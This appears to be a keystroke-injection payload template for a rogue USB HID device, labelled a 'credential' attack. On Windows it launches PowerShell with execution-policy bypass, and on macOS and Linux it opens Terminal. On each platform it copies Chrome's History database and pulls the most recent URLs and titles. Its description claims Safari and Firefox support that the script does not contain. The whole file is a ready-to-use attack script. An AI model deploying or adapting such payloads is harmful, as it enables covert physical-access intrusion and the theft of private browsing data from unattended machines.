NAME Browser History Dump
DESCRIPTION Extracts recent browser history from Chrome/Safari/Firefox
CATEGORY credential
PLATFORMS WIN,MAC,LINUX
OPTION DELAY 2000 "Initial HID enumeration delay (ms)"
OPTION COUNT 50 "Number of recent entries to extract"
PLATFORM WIN
DELAY {{DELAY}}
GUI r
DELAY 800
STRING powershell -nop -ep bypass
ENTER
DELAY 1200
STRING $h="$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History";$t="$env:TEMP\h.db";Copy-Item $h $t -Force 2>$null;Add-Type -Path "$env:LOCALAPPDATA\..\Roaming\..\Local\Microsoft\WindowsApps\Microsoft.Winget.Source_*\SQLite\System.Data.SQLite.dll" 2>$null;try{$c=New-Object System.Data.SQLite.SQLiteConnection("Data Source=$t");$c.Open();$q=$c.CreateCommand();$q.CommandText="SELECT url,title FROM urls ORDER BY last_visit_time DESC LIMIT {{COUNT}}";$r=$q.ExecuteReader();while($r.Read()){Write-Host $r[0] $r[1]};$c.Close()}catch{Write-Host 'Chrome history unavailable'}
ENTER
PLATFORM MAC
DELAY {{DELAY}}
GUI SPACE
DELAY 700
STRING Terminal
ENTER
DELAY 1400
STRING cp ~/Library/Application\ Support/Google/Chrome/Default/History /tmp/h.db 2>/dev/null && sqlite3 /tmp/h.db "SELECT url,title FROM urls ORDER BY last_visit_time DESC LIMIT {{COUNT}}"; rm -f /tmp/h.db
ENTER
PLATFORM LINUX
DELAY {{DELAY}}
CTRL ALT t
DELAY 1400
STRING cp ~/.config/google-chrome/Default/History /tmp/h.db 2>/dev/null && sqlite3 /tmp/h.db "SELECT url,title FROM urls ORDER BY last_visit_time DESC LIMIT {{COUNT}}"; rm -f /tmp/h.db
ENTER
